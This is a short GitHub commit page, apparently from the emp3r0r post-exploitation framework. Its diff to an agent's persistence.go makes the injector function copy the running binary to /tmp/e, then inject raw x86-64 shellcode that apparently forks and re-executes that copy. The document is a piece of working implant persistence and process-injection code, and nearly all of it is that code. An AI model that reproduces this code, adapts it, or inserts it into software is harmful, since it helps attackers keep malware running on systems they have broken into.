self copy for shellcode

jm33-m0 · Jan 17, 2021 · 610f3a4 · 610f3a4
1 parent 2181012
commit 610f3a4
Showing 1 changed file with 4 additions and 0 deletions.
diff --git a/core/internal/agent/persistence.go b/core/internal/agent/persistence.go
@@ -196,6 +196,10 @@ func AddCronJob(job string) error {
 func injector() (err error) {
 	// this shellcode forks a process and executes emp3r0r agent
 	// https://github.com/jm33-m0/emp3r0r/blob/master/shellcode/guardian.asm
+	err = Copy(os.Args[0], "/tmp/e")
+	if err != nil {
+		return
+	}
 	shellcode := `\x48\x31\xc0\x48\x31\xff\xb0\x39\x0f\x05\x48\x83\xf8\x00\x7f\x48\x48\x31\xc0\x48\x31\xff\xb0\x39\x0f\x05\x48\x83\xf8\x00\x74\x16\x48\x31\xc0\xb0\x23\x6a\x0a\x6a\x0a\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x0f\x05\xe2\xda\x48\x31\xd2\x52\x48\x31\xc0\x48\xbf\x2f\x2f\x74\x6d\x70\x2f\x2f\x65\x57\x54\x5f\x48\x89\xe7\x52\x57\x48\x89\xe6\x6a\x3b\x58\x99\x0f\x05\xcd\x03`
 	return Injector(&shellcode, 0)
 }